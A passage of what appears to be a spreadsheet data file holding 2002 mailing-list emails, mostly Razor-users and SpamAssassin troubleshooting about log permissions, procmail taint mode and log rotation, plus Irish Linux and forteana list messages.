(Texas)\nSleepy Hollow by Nuttdriver by Nuttdriver\n(Traditional Cache) (GC8884) (71.17 miles SW)\n[URL]http://www.geocaching.com[/URL]\n\n9/4/2002 (Texas)\nFoot Bridge:  Parker Spring by Altie and oneoldman\n(Virtual Cache) (GC89BB) (96.65 miles S)\n[URL]http://www.geocaching.com[/URL]\n\n\nYour account name is 'lrosenman'.  If you would like to be removed from this\nlist, please log into the web site and uncheck cache notifications through\nthe "modify your account" link on your "my cache page".</t>
  </si>
  <si>
    <t>http://www.geocaching.com http://www.geocaching.com http://www.geocaching.com http://www.geocaching.com http://www.geocaching.com http://www.geocaching.com http://www.geocaching.com http://www.geocaching.com http://www.geocaching.com http://www.geocaching.com http://www.geocaching.com http://www.geocaching.com</t>
  </si>
  <si>
    <t>To: razor-users@example.sourceforge.net\nFrom: David Rees &lt;dbr@greenhydrant.com&gt;\nDate: Thu, 5 Sep 2002 19:18:20 -0700</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 19:18:20 -0700</t>
  </si>
  <si>
    <t>David Rees &lt;dbr@greenhydrant.com&gt;</t>
  </si>
  <si>
    <t>On Thu, Sep 05, 2002 at 10:12:59PM -0400, Leland Woodbury wrote:\n&gt; I found a nice little Perl script for this purpose called rotate, which \n&gt; makes the process of rotating log files very simple.  If there's an \n&gt; official source for this script, I couldn't find it.  (My hosting \n&gt; provider, pair.com, has it installed, and that's where I found it.) \n&gt;  However, redistribution appears to be allowed, so I've attached it.\n\nThanks for the script.  It also appears that the standard logrotate tools\nincluded with many systems (or at least RedHat systems) will support\nwildcards when rotating files so something like\n/home/*/.razor/razor-agent.log can be specified...\n\n-Dave\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: OSDN - Tired of that same old\ncell phone?  Get a new here for FREE!\n[URL]https://www.inphonic.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: Irish Linux Users Group &lt;ilug@linux.ie&gt;\nFrom: Rick Moen &lt;rick@linuxmafia.com&gt;\nDate: Thu, 5 Sep 2002 19:14:45 -0700</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 19:14:45 -0700</t>
  </si>
  <si>
    <t>Re: [ILUG] modem problems</t>
  </si>
  <si>
    <t>Quoting Waider (waider@waider.ie):\n\n&gt; Niall Sheridan wrote:\n&gt; | A power cycle will do it.\n&gt; | Other than that it's chipset specific.\n&gt; \n&gt; sure. tried powercycling an internal modem recently? :)\n&gt; \n&gt; Waider. This is Rick Moen bait.\n\nThanks.  It was delicious.  ;-&gt;\n\n-- \nCheers,               "That article and its poster have been cancelled." \nRick Moen                   -- David B. O'Donnel, sysadmin for America Online\nrick@linuxmafia.com\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: Michael Duff &lt;michael.duff@sri.com&gt;\nFrom: Mike Burger &lt;mburger@bubbanfriends.org&gt;\nDate: Thu, 5 Sep 2002 19:02:52 -0500 (EST)</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 19:02:52 -0500 (EST)</t>
  </si>
  <si>
    <t>Michael Duff &lt;michael.duff@sri.com&gt;</t>
  </si>
  <si>
    <t>Shouldn't there be a w, somewhere in tehre?  Simply setting group and  owner to read and execute won't alleviate a write problem. On Thu, 5 Sep 2002, Michael Duff wrote: &gt; This is due to insufficient write privileges to the "razor-agent.log"  &gt; file. A quick work-around is to do a "chmod go+rx" on that file (of  &gt; course, it's better to restrict the access as much as possible). &gt;  &gt; In Agent.pm, when the Razor2::Logger object is created, if it doesn't  &gt; have write permission to the log file it does not succeed. Then, later  &gt; in the code when the log object is used, it fails with the "unblessed"  &gt; error. &gt;  &gt; Hope this helps, &gt; Michael Duff &gt;  &gt; David Rees wrote: &gt;  &gt; &gt;This is my first time running Razor, heard a lot of good things about it so &gt; &gt;I thought I'd give it a shot.  I also run SpamAssassin so I'd like to &gt; &gt;integrate the two. &gt; &gt; &gt; &gt;I'm not sure if this problem is with SpamAssassin or Razor, so I though I'd &gt; &gt;shoot the message here first &gt; &gt; &gt; &gt;With a freshly installed SpamAssassin 2.41 and Razor 2.14 I'm seeing these &gt; &gt;messages spit out from spamd: &gt; &gt; &gt; &gt;razor2 check skipped: No such file or directory Can't call method "log" on &gt; &gt;unblessed reference at /usr/lib/perl5/site_perl/5.6.0/Razor2/Client/Agent.pm &gt; &gt;line 211,  line 75. &gt; &gt; &gt; &gt;Any ideas?  razor seems to run correctly over the command line. &gt; &gt; &gt; &gt;Thanks, &gt; &gt;-Dave &gt; &gt; &gt; &gt; &gt; &gt;------------------------------------------------------- &gt; &gt;This sf.net email is sponsored by: OSDN - Tired of that same old &gt; &gt;cell phone?  Get a new here for FREE! &gt; &gt;[URL]https://www.inphonic.com[/URL] &gt; &gt;_______________________________________________ &gt; &gt;Razor-users mailing list &gt; &gt;Razor-users@lists.sourceforge.net &gt; &gt;[URL]https://lists.sourceforge.net[/URL] &gt; &gt;   &gt; &gt; &gt;  &gt;  &gt;  &gt;  &gt;  &gt; ------------------------------------------------------- &gt; This sf.net email is sponsored by: OSDN - Tired of that same old &gt; cell phone?  Get a new here for FREE! &gt; [URL]https://www.inphonic.com[/URL] &gt; _______________________________________________ &gt; Razor-users mailing list &gt; Razor-users@lists.sourceforge.net &gt; [URL]https://lists.sourceforge.net[/URL] &gt;  ------------------------------------------------------- This sf.net email is sponsored by: OSDN - Tired of that same old cell phone?  Get a new here for FREE! [URL]https://www.inphonic.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: "Theo Van Dinter" &lt;felicity@kluge.net&gt;\nFrom: "Eugene Chiu" &lt;eugene@chiu.bz&gt;\nDate: Thu, 5 Sep 2002 18:18:55 -0400</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 18:18:55 -0400</t>
  </si>
  <si>
    <t>"Eugene Chiu" &lt;eugene@chiu.bz&gt;</t>
  </si>
  <si>
    <t>"Theo Van Dinter" &lt;felicity@kluge.net&gt;</t>
  </si>
  <si>
    <t>RE: [Razor-users] spamassassin+razor2</t>
  </si>
  <si>
    <t>Theo, Thank you very much, it solves the problem!!!! Eugene -----Original Message----- From: razor-users-admin@example.sourceforge.net [mailto:razor-users-admin@lists.sourceforge.net]On Behalf Of Theo Van Dinter Sent: September 5, 2002 4:38 PM To: Eugene Chiu Cc: razor-users@example.sourceforge.net Subject: Re: [Razor-users] spamassassin+razor2 On Thu, Sep 05, 2002 at 04:27:08PM -0400, Eugene Chiu wrote: &gt; razor2 check skipped: Bad file descriptor Insecure dependency in open while runn &gt; ing setuid at /usr/local/lib/perl5/site_perl/5.6.1/Razor2/Client/Config.pm line &gt; 410,  line 1. &gt; &gt;From info@znion.com  Thu Sep  5 11:55:15 2002 &gt;  Subject: *****SPAM***** Computer Maintenance &gt;   Folder: /home/eugene/caughtspam 8343 It looks like you're running via procmail -- what are the permissions on procmail?  "Insecure dependency" screams "I'm in taint mode!", which is a typical problem when procmail is setuid/setgid (the permissions should be 755). If this is in fact the problem, an easy solution is to put "DROPPRIVS=yes" in the procmailrc. :) -- Randomly Generated Tagline: "The bus had no heat, blew over in the wind and used the driver's legs  as its first line of defense in an accident." - Unknown about the VW Bus ------------------------------------------------------- This sf.net email is sponsored by: OSDN - Tired of that same old cell phone?  Get a new here for FREE! [URL]https://www.inphonic.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: David Rees &lt;dbr@greenhydrant.com&gt;\nFrom: Mike Burger &lt;mburger@bubbanfriends.org&gt;\nDate: Thu, 5 Sep 2002 18:16:57 -0500 (EST)</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 18:16:57 -0500 (EST)</t>
  </si>
  <si>
    <t>You might be better asking this on the spamassassin-talk list.  The folks  there will almost definitely have an answer for this. On Thu, 5 Sep 2002, David Rees wrote: &gt; This is my first time running Razor, heard a lot of good things about it so &gt; I thought I'd give it a shot.  I also run SpamAssassin so I'd like to &gt; integrate the two. &gt;  &gt; I'm not sure if this problem is with SpamAssassin or Razor, so I though I'd &gt; shoot the message here first &gt;  &gt; With a freshly installed SpamAssassin 2.41 and Razor 2.14 I'm seeing these &gt; messages spit out from spamd: &gt;  &gt; razor2 check skipped: No such file or directory Can't call method "log" on &gt; unblessed reference at /usr/lib/perl5/site_perl/5.6.0/Razor2/Client/Agent.pm &gt; line 211,  line 75. &gt;  &gt; Any ideas?  razor seems to run correctly over the command line. &gt;  &gt; Thanks, &gt; -Dave &gt;  &gt;  &gt; ------------------------------------------------------- &gt; This sf.net email is sponsored by: OSDN - Tired of that same old &gt; cell phone?  Get a new here for FREE! &gt; [URL]https://www.inphonic.com[/URL] &gt; _______________________________________________ &gt; Razor-users mailing list &gt; Razor-users@lists.sourceforge.net &gt; [URL]https://lists.sourceforge.net[/URL] &gt;  ------------------------------------------------------- This sf.net email is sponsored by: OSDN - Tired of that same old cell phone?  Get a new here for FREE! [URL]https://www.inphonic.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: razor-users@example.sourceforge.net\nFrom: David Rees &lt;dbr@greenhydrant.com&gt;\nDate: Thu, 5 Sep 2002 18:13:08 -0700</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 18:13:08 -0700</t>
  </si>
  <si>
    <t>On Thu, Sep 05, 2002 at 08:53:16PM -0400, Theo Van Dinter wrote:\n&gt; On Thu, Sep 05, 2002 at 06:16:57PM -0500, Mike Burger wrote:\n&gt; &gt; You might be better asking this on the spamassassin-talk list.  The folks \n&gt; &gt; there will almost definitely have an answer for this.\n&gt; \n&gt; I posted a fairly lengthy complete answer to this problem and how to\n&gt; get around it in SA 2.41 on the spamassassin-talk list. :)\n\nThanks for the post there, it answered all my questions about\nspamassassin/razor interaction.\n\nNow for a razor question:\n\nI'm worried about having a server full of razor-agent.log files which keep\non growing.  Is it possible to configure razor log via SYSLOG to make it\neasy to rotate logs?  Searching through the man pages didn't turn anything\nup...  Otherwise I'll have to write a script to go through each user's home\ndirectory looking for razor-agent.log files to rotate periodically.\n\nThanks,\nDave\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: OSDN - Tired of that same old\ncell phone?  Get a new here for FREE!\n[URL]https://www.inphonic.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: irish linux users group &lt;ilug@linux.ie&gt;\nFrom: Rick Moen &lt;rick@linuxmafia.com&gt;\nDate: Thu, 5 Sep 2002 17:38:11 -0700</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 17:38:11 -0700</t>
  </si>
  <si>
    <t>Re: [ILUG] windows users accessing cvs...</t>
  </si>
  <si>
    <t>Quoting kevin lyda (kevin+dated+1031593647.e87527@ie.suberic.net):\n\n&gt; anyone here have experience with windows cvs clients accessing a cvs\n&gt; server *securely*.  preferably using ssh of some form (putty or cygwin's\n&gt; openssh port) and the wincvs client?\n\nHere's something I cobbled together:\n[URL]http://sourceforge.net[/URL]\n\n-- \nCheers,           "I don't like country music, but I don't mean to denigrate\nRick Moen         those who do.  And, for the people who like country music,\nrick@linuxmafia.com         denigrate means 'put down'."      -- Bob Newhart\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://sourceforge.net http://www.linux.ie</t>
  </si>
  <si>
    <t>To: razor-users@example.sourceforge.net\nFrom: Josh Hildebrand &lt;josh@jedi.net&gt;\nDate: Thu, 5 Sep 2002 17:31:53 -0500</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 17:31:53 -0500</t>
  </si>
  <si>
    <t>Re: [Razor-users] spamassassin+razor2</t>
  </si>
  <si>
    <t>No as a answer to this FAQ, would the recommended answer be to  a) chmod 755 /usr/bin/procmail or  b) add DROPPRIVS=yes to /etc/procmailrc or  c) all of the above I ask because I just did B, and my procmail is still: -rwsr-sr-x    1 root     mail        67988 Jul 24 15:43 /usr/bin/procmail But things seem to be working, so far.. On Thu, Sep 05, 2002 at 06:18:55PM -0400, Eugene Chiu wrote: &gt;  &gt; Theo, &gt;  &gt; Thank you very much, it solves the problem!!!! &gt;  &gt; Eugene &gt;  &gt;  &gt; -----Original Message----- &gt; From: razor-users-admin@example.sourceforge.net &gt; [mailto:razor-users-admin@lists.sourceforge.net]On Behalf Of Theo Van &gt; Dinter &gt; Sent: September 5, 2002 4:38 PM &gt; To: Eugene Chiu &gt; Cc: razor-users@example.sourceforge.net &gt; Subject: Re: [Razor-users] spamassassin+razor2 &gt;  &gt;  &gt; On Thu, Sep 05, 2002 at 04:27:08PM -0400, Eugene Chiu wrote: &gt; &gt; razor2 check skipped: Bad file descriptor Insecure dependency in open &gt; while runn &gt; &gt; ing setuid at /usr/local/lib/perl5/site_perl/5.6.1/Razor2/Client/Config.pm &gt; line &gt; &gt; 410,  line 1. &gt; &gt; &gt;From info@znion.com  Thu Sep  5 11:55:15 2002 &gt; &gt;  Subject: *****SPAM***** Computer Maintenance &gt; &gt;   Folder: /home/eugene/caughtspam &gt; 8343 &gt;  &gt; It looks like you're running via procmail -- what are the permissions &gt; on procmail?  "Insecure dependency" screams "I'm in taint mode!", which &gt; is a typical problem when procmail is setuid/setgid (the permissions &gt; should be 755). &gt;  &gt; If this is in fact the problem, an easy solution is to put "DROPPRIVS=yes" &gt; in the procmailrc. :) &gt;  &gt; -- &gt; Randomly Generated Tagline: &gt; "The bus had no heat, blew over in the wind and used the driver's legs &gt;  as its first line of defense in an accident." - Unknown about the VW Bus &gt;  &gt;  &gt;  &gt; ------------------------------------------------------- &gt; This sf.net email is sponsored by: OSDN - Tired of that same old &gt; cell phone?  Get a new here for FREE! &gt; [URL]https://www.inphonic.com[/URL] &gt; _______________________________________________ &gt; Razor-users mailing list &gt; Razor-users@lists.sourceforge.net &gt; [URL]https://lists.sourceforge.net[/URL] --  Josh Hildebrand          Email: josh@jedi.net Digital Sluice           Pager: [URL]http://www.digitalsluice.com[/URL] Phone: 512-255-9797      eFax: 413-691-9191 ------------------------------------------------------- This sf.net email is sponsored by: OSDN - Tired of that same old cell phone?  Get a new here for FREE! [URL]https://www.inphonic.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>https://www.inphonic.com https://lists.sourceforge.net http://www.digitalsluice.com https://www.inphonic.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: razor-users@example.sourceforge.net\nFrom: Josh Hildebrand &lt;josh@jedi.net&gt;\nDate: Thu, 5 Sep 2002 17:11:32 -0500</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 17:11:32 -0500</t>
  </si>
  <si>
    <t>[Razor-users] removing Razor1</t>
  </si>
  <si>
    <t>Forgive me for being a partially stupid end-user of this fantastic\nspam fighting software.\n\nI was looking at my spamd debug output today, and noticed that it ran\nthrough Razor2 stuff, and then it ran through dccproc, and then it tried to\ngo through old Razor1 stuff.  I'm assuming (and please correct me if I'm\nwrong) that Razor1 is out dated and was to be replaced entirely by Razor2.\n\nIf that's the case, can someone please point me to something that explains\nhow to remove Razor1 from my system?  I don't see a point in envoking it.\nEspecially when it appears to error out on me.\n\ndebug: Razor1 is available\ndebug: entering helper-app run mode\ndebug: Razor Agents 1.19, protocol version 2.\ndebug: 170803 seconds before closest server discovery\ndebug: Agent terminated\nProblem while trying to load Razor1: Permission denied  at\n/usr/local/lib/perl5/site_perl/5.6.1/Mail/SpamAssassin/Dns.pm line 288.\ndebug: leaving helper-app run mode\n\nThanks!\n\n-- \nJosh Hildebrand          Email: josh@jedi.net\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: OSDN - Tired of that same old\ncell phone?  Get a new here for FREE!\n[URL]https://www.inphonic.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: "zzzzteana@egroups" &lt;zzzzteana@yahoogroups.com&gt;\nFrom: Brian Chapman &lt;wt046@victoria.tc.ca&gt;\nDate: Thu, 5 Sep 2002 16:57:23 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 16:57:23 -0700 (PDT)</t>
  </si>
  <si>
    <t>"zzzzteana@egroups" &lt;zzzzteana@yahoogroups.com&gt;</t>
  </si>
  <si>
    <t>[zzzzteana] Frog Fall at Cheapside</t>
  </si>
  <si>
    <t>Near the end of his *Memoirs of Extraordinary Popular Delusions and the\nMadness of Crowds* (1851), Charles Mackay discusses various catch phrases\nbriefly popular in mid-19th-century London. One of them, he observes,\n"like a mushroom, seems to have sprung up in the night, or, like a frog in\nCheapside, to have come down in a sudden shower. One day it was unheard,\nunknown, uninvented; the next it pervaded London."\n\nWas "like a frog in Cheapside" (or something similar) a catch phrase\nitself, or did Mackay come up with the simile on his own?\n\nAnd to what event or events does it refer?\n\nI didn't find anything relevant in Partridge's *A Dictionary of Catch\nPhrases.*\n\nbc\n\n\n\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\nLooking for a more powerful website? Try GeoCities for $8.95 per month.\nRegister your domain name ([URL]http://your-name.com[/URL] More storage! No ads!\n[URL]http://geocities.yahoo.com[/URL]\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>http://your-name.com http://geocities.yahoo.com http://us.click.yahoo.com http://docs.yahoo.com</t>
  </si>
  <si>
    <t>To: zzzzteana@yahoogroups.com\nFrom: That Goddess Chick &lt;felinda@frogstone.net&gt;\nDate: Thu, 5 Sep 2002 16:50:38 -0500</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 16:50:38 -0500</t>
  </si>
  <si>
    <t>[zzzzteana] Re: Cincinnati Group Wants To Stamp Out Hotel Sex Movies</t>
  </si>
  <si>
    <t>&gt;\n&gt;&gt;  (CNSNews.com) - A pro-family group in Cincinnati that has pressured\n&gt;&gt;  two area hotels to stop showing adult pay-per-view movies has vowed\n&gt;to\n&gt;&gt;  expand its grass- roots campaign nationwide.\n&gt;\n&gt;\n&gt;Quite right. And while they're at it, they can get that bunch of\n&gt;religious nuts to stop sneaking their book of hate and intolerence\n&gt;into the bedside cabinets, you know, that one with all the telephone\n&gt;humbers in it.\n&gt;\n&gt;Oh, and the Gideon Society can take their bibles back as well.\n&gt;\n&gt;RobinH\n&gt;\n\nWhat are you talking about??? That book is where all the best free porn is!!\n\nPiece of trivia: the thing is so pithy it floats!!\n-- \n\n\nFel\n[URL]http://www.frogstone.net[/URL]\nWeird Page: [URL]http://my.athenet.net[/URL]\n\n[Non-text portions of this message have been removed]\n\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: Eirikur Hallgrimsson &lt;eh@mad.scientist.com&gt;\nFrom: CDale &lt;cdale@techmonkeys.net&gt;\nDate: Thu, 5 Sep 2002 16:40:13 -0500 (CDT)</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 16:40:13 -0500 (CDT)</t>
  </si>
  <si>
    <t>LOL!  They're not doomed at all.  Thousands of men wear cb2000s to work \nevery day (along with other chastity devices).    They are not just \ndecorations.  You will not get a woody or have an orgasm until your \nkeyholder allows you to.  Anyhow, I know better than to have this \ntype of conversation with a 'nilla, but these men wear these happily, and \nconsensually.  (:  There is little power struggle in the lifestyles of the \npeople who use these.  There is power exchange instead.  Lots of \nvariations on the definition, but this one's from Gloria Brame's site:\n\nPower exchange: the consensual transfer of power by the submissive to the \ndominant. The exchange takes place when the returned energy from the \ndominant empowers the submissive. \n\nAnyhow, there are tons of informative sites out there for anyone who cares \nto read them, but I assure you, the chastity device business is doing very \nwell, and it is illegal to force someone to wear one.  It's not coercion, \nit is creative sensuality.  (:\nCindy\n\nOn Thu, 5 Sep 2002, Eirikur Hallgrimsson wrote:\n\n&gt; On Wednesday 04 September 2002 10:59 pm, CDale wrote:\n&gt; &gt; Someone needs to tell the mayor about this:\n&gt; &gt; [URL]http://www.cb-2000.com[/URL]\n&gt; \n&gt; "Chastity" technologies were doomed from the start, and I'll add chemical \n&gt; ones to the trash heap.  (Yeah, Cindy, these are decorative toys for the \n&gt; subculture, but....)  \n&gt; \n&gt; Generally,someone is attempting to preserve a relationship with this \n&gt; nonsense, when quite plainly the the relationship is in a state where \n&gt; preserving it is of little value.  Hardware is of no real use save for \n&gt; playing the power-struggle game.   I don't want to see the future of this.\n&gt; "Invisible Fence" for your mate.   "Must wear" location transponders and \n&gt; endocrine monitors.   More movies like "Minority Report."\n&gt; \n&gt; It seems so automatic for people to reach for coercive solutions.   So \n&gt; surprizing given the low absolute effectiveness of coercion in the absense \n&gt; of overwhelming force advantage.\n&gt; \n&gt; Eirikur\n&gt; \n&gt; \n&gt; \n\n-- \n"I don't take no stocks in mathematics, anyway" --Huckleberry Finn</t>
  </si>
  <si>
    <t>To: Eugene Chiu &lt;eugene@chiu.bz&gt;\nFrom: Theo Van Dinter &lt;felicity@kluge.net&gt;\nDate: Thu, 5 Sep 2002 16:38:18 -0400</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 16:38:18 -0400</t>
  </si>
  <si>
    <t>Eugene Chiu &lt;eugene@chiu.bz&gt;</t>
  </si>
  <si>
    <t>--4Ycl1UgPPPgGZoSL Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Sep 05, 2002 at 04:27:08PM -0400, Eugene Chiu wrote: &gt; razor2 check skipped: Bad file descriptor Insecure dependency in open whi= le runn &gt; ing setuid at /usr/local/lib/perl5/site_perl/5.6.1/Razor2/Client/Config.p= m line &gt; 410,  line 1. &gt; &gt;From info@znion.com  Thu Sep  5 11:55:15 2002 &gt;  Subject: *****SPAM***** Computer Maintenance &gt;   Folder: /home/eugene/caughtspam                                        =   8343 It looks like you're running via procmail -- what are the permissions on procmail?  "Insecure dependency" screams "I'm in taint mode!", which is a typical problem when procmail is setuid/setgid (the permissions should be 755). If this is in fact the problem, an easy solution is to put "DROPPRIVS=3Dyes" in the procmailrc. :) --=20 Randomly Generated Tagline: "The bus had no heat, blew over in the wind and used the driver's legs  as its first line of defense in an accident." - Unknown about the VW Bus --4Ycl1UgPPPgGZoSL Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see [URL]http://www.gnupg.org[/URL] iD8DBQE9d8C5AuOQUeWAs2MRAhaSAJ9AxnypfiK/+5I6gxO8sTauLOJ3wgCg0N5b HPwI8USX9YeAQF6GE4bzmgc= =6aCu -----END PGP SIGNATURE----- --4Ycl1UgPPPgGZoSL-- ------------------------------------------------------- This sf.net email is sponsored by: OSDN - Tired of that same old cell phone?  Get a new here for FREE! [URL]https://www.inphonic.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: razor-users@example.sourceforge.net\nFrom: David Rees &lt;dbr@greenhydrant.com&gt;\nDate: Thu, 5 Sep 2002 16:31:28 -0700</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 16:31:28 -0700</t>
  </si>
  <si>
    <t>On Thu, Sep 05, 2002 at 06:16:57PM -0500, Mike Burger wrote:\n&gt; You might be better asking this on the spamassassin-talk list.  The folks \n&gt; there will almost definitely have an answer for this.\n\nThanks, I just posted a similar message there.\n\n-Dave\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: OSDN - Tired of that same old\ncell phone?  Get a new here for FREE!\n[URL]https://www.inphonic.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: &lt;razor-users@example.sourceforge.net&gt;\nFrom: "Eugene Chiu" &lt;eugene@chiu.bz&gt;\nDate: Thu, 5 Sep 2002 16:27:08 -0400</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 16:27:08 -0400</t>
  </si>
  <si>
    <t>[Razor-users] spamassassin+razor2</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_0018_01C254F9.146CF4F0 Content-Type: text/plain; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hi all, I am wondering if anybody has successfully install a site-wide = spamassassin+razor2 installation. I am having so much trouble and the = following is the extract of my procmail.log. razor2 check skipped: Bad file descriptor Insecure dependency in open = while runn ing setuid at = /usr/local/lib/perl5/site_perl/5.6.1/Razor2/Client/Config.pm line 410,  line 1. &gt;&gt;From info@znion.com  Thu Sep  5 11:55:15 2002  Subject: *****SPAM***** Computer Maintenance   Folder: /home/eugene/caughtspam                                        =   8343 In razor-agent.log, I simply get the bootup message and that's it... Sep 05 11:55:15.668648 check[8478]: [ 1] [bootup] Logging initiated = LogDebugLeve l=3D14 to file:/var/log/razor-agent.log Please help. Thanks. Eugene ------=_NextPart_000_0018_01C254F9.146CF4F0 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hi all, Â  I am wondering if anybody has = successfully install=20 a site-wide spamassassin+razor2 installation. I am having so much = trouble and=20 the following is the extract of my procmail.log. Â  razor2 check skipped: Bad file = descriptor Insecure=20 dependency in open while running setuid at=20 /usr/local/lib/perl5/site_perl/5.6.1/Razor2/Client/Config.pm = line410,=20 &lt;GEN23&gt; line 1.From info@znion.comÂ  Thu SepÂ  5 = 11:55:15=20 2002Â Subject: *****SPAM***** Computer MaintenanceÂ  = Folder:=20 /home/eugene/caughtspamÂ Â Â Â Â Â Â Â &amp;n= bsp;Â Â Â Â Â Â Â Â Â Â Â &amp;nb= sp;Â Â Â Â Â Â Â Â Â Â Â &amp;nbs= p;Â Â Â Â Â Â Â Â =20 8343 Â  Â  In razor-agent.log, I simply get the = bootup message=20 and that's it... Â  Sep 05 11:55:15.668648 check[8478]: [ = 1] [bootup]=20 Logging initiated LogDebugLevel=3D14 to=20 file:/var/log/razor-agent.log Â  Please help. Thanks. Â  Eugene ------=_NextPart_000_0018_01C254F9.146CF4F0-- ------------------------------------------------------- This sf.net email is sponsored by: OSDN - Tired of that same old cell phone?  Get a new here for FREE! [URL]https://www.inphonic.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: razor-users@example.sourceforge.net\nFrom: David Rees &lt;dbr@greenhydrant.com&gt;\nDate: Thu, 5 Sep 2002 16:08:08 -0700</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 16:08:08 -0700</t>
  </si>
  <si>
    <t>[Razor-users] Problem with Razor 2.14 and Spamassassin 2.41</t>
  </si>
  <si>
    <t>This is my first time running Razor, heard a lot of good things about it so I thought I'd give it a shot.  I also run SpamAssassin so I'd like to integrate the two. I'm not sure if this problem is with SpamAssassin or Razor, so I though I'd shoot the message here first With a freshly installed SpamAssassin 2.41 and Razor 2.14 I'm seeing these messages spit out from spamd: razor2 check skipped: No such file or directory Can't call method "log" on unblessed reference at /usr/lib/perl5/site_perl/5.6.0/Razor2/Client/Agent.pm line 211,  line 75. Any ideas?  razor seems to run correctly over the command line. Thanks, -Dave ------------------------------------------------------- This sf.net email is sponsored by: OSDN - Tired of that same old cell phone?  Get a new here for FREE! [URL]https://www.inphonic.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: &lt;fork@spamassassin.taint.org&gt;\nFrom: "Adam L. Beberg" &lt;beberg@mithral.com&gt;\nDate: Thu, 5 Sep 2002 16:02:55 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 5 Sep 2002 16:02:55 -0700 (PDT)</t>
  </si>
  <si>
    <t>Pitch Dark Bar Opens for Blind Dates</t>
  </si>
  <si>
